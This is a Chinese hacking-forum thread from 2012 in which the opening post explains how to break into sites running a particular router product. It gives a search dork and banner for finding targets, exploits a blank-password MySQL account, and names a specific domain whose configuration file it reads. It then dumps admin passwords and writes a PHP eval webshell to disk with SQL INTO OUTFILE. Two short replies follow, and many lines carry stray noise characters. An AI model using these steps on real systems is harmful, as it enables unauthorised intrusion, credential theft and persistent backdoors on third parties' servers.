找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2799|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:3 x5 m  |4 u2 S. R6 K, E0 Y! f
  ]7 `7 p' D$ p  Y6 z* Q/ k
1:google搜索'Raonet Subscriber Ethernet Router'$ h9 z1 v: _# i: n3 H

/ ^; q7 w$ o" s3 o( `" i% t5 w2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001( C  v" u& u1 g8 u! T+ D- t: D7 m7 n
) r' l9 z' o& M! G9 }# k
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
2 X( S' R6 B$ u& {: L0 k1 U4 P/ f" h9 C2 b! k& K
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......6 @5 \: z- ^$ C. T  w

6 w" y5 s) b* c" M# q9 ?- _% D 8 K# W1 Y6 H! |
+ u% e: H- D  Z6 B. a  ^
入侵步骤:
. g( t% W- ^( A( P8 G
+ T$ o/ e& j9 R3 [& C1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
# |9 Q' u( A2 q# u. K4 Q! L: ]. w9 c! a1 d7 T
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
0 A" o4 q& ]: ~) S. D, v3:得到密码后连接,查看GUI管理密码:
' F- }% s& t. r* |0 y0 Ouse ser_500/ f! e3 x, K8 E) @. \: D
select id,passwd from user;
3 Z! h, c& x* U) A4:通过数据库写入webshell,执行命令:
0 a5 F$ A6 ~/ q, f2 b: `3 T6 `9 _' ]use mysql;
; z$ o4 {7 `  xcreate table ok(cmd TEXT);
" N3 Z! s/ u6 ~; u; u# rinsert into ok values("<?php @eval($_POST[cmd])?>");
( r  H) ]  {. u' Bselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
8 P) j/ v) v9 g7 O" f0 \drop table ok;
. W: P. f/ F' }' Y- _' d9 |: z% `: e0 m; m8 @# N
5:连接后门shell.php
4 v! c" A: K. b+ f; d, r! I% ?' N" a( K- ?8 {
6. 搞定!
* v5 n) i6 z) A2 a8 q+ v
& ?, I/ ?2 [+ q8 h
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表